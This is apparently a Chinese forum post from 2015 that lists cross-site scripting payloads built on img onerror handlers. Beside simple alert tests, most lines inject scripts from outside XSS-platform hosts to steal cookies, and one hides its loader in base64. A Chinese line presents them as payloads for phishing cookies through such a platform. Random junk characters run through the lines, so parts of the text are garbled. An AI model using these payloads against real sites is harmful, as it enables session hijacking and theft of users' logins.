<img src='non-exist.jpg'onerror="alert('xss')">
8 H* n% P8 A4 ~, ]<img src=# onerror=alert(123)>
2 F+ H6 |2 }" `. ^7 B<img src=# onerror=alert(document.cookie)>
* i- j! }5 L' {5 d- q; V$ H- o下面是利用平台钓cookie的0 K5 Z- P$ u6 w! m( z
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
) n3 b# w: S! J$ i7 T+ f6 j$ d
6 i6 T, ]$ t' n' J$ Q
& b) Q5 {. t" M4 K% G: |4 d<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
" N! A; e g x<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
- G$ `) }, @0 m“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
* R' e5 K7 G K7 n' B6 F<img src=1 onerror=jQuery.getScript("//xss.re/974")> ; z1 l. n) F1 M+ ~7 Z
<img src="#">7 q0 N8 n- t( o3 R/ n9 W5 z" w
<img src="#">
- X) @/ Y- X+ j/ x) `<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>; j0 {6 x( d0 G3 \
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0"># m! N) h& W! {0 [* x) C9 ?6 X
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
' ^% }' a0 G5 g6 y3 `# H<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
# ?" j, e. t4 D<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>) x: T, A$ P% {- i" [3 X
<img src=x width="0" height="0"></img>4 o$ K9 r$ A2 k4 u& v
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>6 X' z1 G; W; M9 ?! M
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
, k/ M% t9 x, M( g/ J( A/ ` |
发表于 2015-10-18 14:33:54
收藏
支持
反对